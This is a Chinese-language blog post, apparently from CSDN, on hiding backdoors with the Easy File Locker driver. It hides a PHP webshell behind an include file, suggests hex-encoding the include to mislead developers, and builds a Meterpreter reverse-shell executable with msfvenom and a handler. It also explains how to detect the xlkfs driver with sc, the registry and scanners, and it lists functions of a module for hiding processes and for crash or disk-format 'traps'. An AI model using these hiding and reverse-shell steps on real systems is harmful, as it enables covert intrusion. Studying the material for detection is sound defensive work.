我会肾透——利用驱动隐藏后门

简单介绍:

驱动隐藏我们可以用过一些软件来实现,软件名字叫:Easy File Locker 下载链接: http://www.xoslab.com/efl.html

一般做黑链的小朋友都会这样设置:只勾选可读,其他的一律拒绝……那么,会有这样的效果,该文件不会显示,不能通过列目录列出来,也不能删除,除非你知道完整路径,你才可以读取文件内容。

并且该软件还可以设置密码,启动、修改设置、卸载及重复安装的时候都需要密码,更蛋疼的是,主界面、卸载程序等都可以删除,只留下核心的驱动文件就行了。

php后门测试:

先写一个用于包含的文件test.php,用于包含shell文件1111.jpg
在这里插入图片描述
再写一个shell文件,里面是一句话木马
在这里插入图片描述
添加需要隐藏的文件,如1111.jpg

4个选项,选中的分别为可访问、可读写、可删除,未选的为可视化(隐藏)
在这里插入图片描述
之后发现文件目录下的1111.jpg消失了,即使是打开显示所有的隐藏文件,都无法看到
在这里插入图片描述
在这里插入图片描述
访问测试,shell运行成功
在这里插入图片描述

使用工具进行后门排查:

使用安全狗进行网站安全扫描,未发现shell文件1111.jpg,并且判断test.php无危害
在这里插入图片描述

D盾_webshell查杀工具扫描,未发现shell文件
在这里插入图片描述

上火绒,360安全卫士依然未发现

当然,日志中记录了相关的访问记录,例如使用360星图分析apache日志,就能发现一些痕迹
在这里插入图片描述

备注:

对php后门进行了一些测试,最好是使用包含,直接隐藏php文件不可解析(推测是动态语言受限制,html文件可以解析),无法配合ADS隐藏文件进行使用。

关于工具爆出的可疑脚本test.php 可以在包含脚本test.php里面使用16进制编码以及各种嵌套来迷惑开发人员,当然还有各种配合使用的隐藏方法,就看你有多少想象力了

exe后门测试:

使用msf写一个反弹shell的后门:

`msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=9999 -f  exe -o  /root/shell.exe`

在这里插入图片描述

msf中设置监听

use exploit/multi/handler

在这里插入图片描述

上线成功

在这里插入图片描述

对shell.exe文件使用工具进行隐藏,不影响后门的上线
在这里插入图片描述

后门排查:

可以看到,虽然shell文件被隐藏,但是进程还在
在这里插入图片描述

命令:wmic

然后输入:process

依然可以看到进程文件位置
在这里插入图片描述

上火绒扫描,直接干掉
在这里插入图片描述

排查思路:

当我们发现了后门文件的痕迹,但是无法找到文件时,就可以猜测,是否是使用了驱动觐见隐藏

这些是典型特征

c:\WINDOWS\xlkfs.dat
c:\WINDOWS\xlkfs.dll
c:\WINDOWS\xlkfs.ini
c:\WINDOWS\system32\drivers\xlkfs.sys

使用everything搜索,发现存在特征
在这里插入图片描述

命令tasklist与services.msc查看进程与服务时,查不到该进程和服务
在这里插入图片描述

使用D盾_webshell工具检测进程无发现

上火绒🗡,进程无发现,但是在驱动中发现了xlkfs
在这里插入图片描述

也可以使用sc进行查询

SC命令,是用来与服务控制管理器和服务进行通信的命令行程序。

sc query xlkfs //query-----------查询服务的状态
在这里插入图片描述
sc qc xlkfs 查询服务配置信息
在这里插入图片描述
在注册表中检查服务

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services
在这里插入图片描述
命令net stop xlkfs 停止服务

隐藏的文件显示出来
在这里插入图片描述

易语言辅助必备驱动保护模块 代码公开 透明 绝无暗装之类 ------------------------------ .版本 2 .子程序 关闭保护辅助进程, 逻辑型, 公开, 取消禁止结束并保护程序 .参数 进程ID, 整数型, 可空, 可空,默认取消自身,可用的进程_名取ID()获取进程ID, .子程序 关闭防各类调试, 逻辑型, 公开, 取消结束并保护程序 .参数 进程ID, 整数型, 可空, 可空,默认取消自身,可用的进程_名取ID()获取进程ID, .子程序 开启保护辅助进程, 逻辑型, 公开, 可禁止他人有意结束某程序,并保护程序不被注入,打开程序,支持所有系统,32,WIN764位都可以 .参数 进程ID, 整数型, 可空, 可空,默认保护自身,可用的进程_名取ID()获取进程ID, .子程序 开启防各类调试, 逻辑型, 公开, 可禁止他人有意,用CE,VE,ME,GE,内存工具和WPE等程序,打开程序,支持所有系统,32,WIN764位都可以 .参数 进程ID, 整数型, 可空, 可空,默认保护自身,可用的进程_名取ID()获取进程ID, .子程序 隐藏模块, 逻辑型, 公开, 隐藏模块 (GetModuleHandle (“隐藏.dll”)) .参数 模块基地址, 整数型 .子程序 郁金香取消隐藏进程, 逻辑型, 公开, 取消隐藏进程 暂时无法取消隐藏 .参数 进程ID, 整数型, 可空, 可空,默认取消自身,可用进程_名取ID()获取进程ID, .子程序 郁金香隐藏进程, 逻辑型, 公开, 隐藏进程,,支持32位,和64位WIn7,与所有系统请自行测试 .参数 进程ID, 整数型, 可空, 可空,默认隐藏自身,可用进程_名取ID()获取进程ID, .子程序 置格盘陷阱, 逻辑型, 公开 .子程序 置蓝屏陷阱, 逻辑型, 公开, 利用蓝屏代码 绝对值蓝屏 .子程序 置死机陷阱, 逻辑型, 公开 .子程序 置重启陷阱, 逻辑型, 公开, 绝对值重启 .DLL命令 GetModuleHandle, 整数型, "kernel32", "GetModuleHandleA", 公开 .参数 lpModuleName, 文本型 .DLL命令 RtlMoveMemory, 整数型, , "RtlMoveMemory", 公开, _写内存3 .参数 dest, 整数型, 传址 .参数 Source, 整数型 .参数 len, 整数型, , 4
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值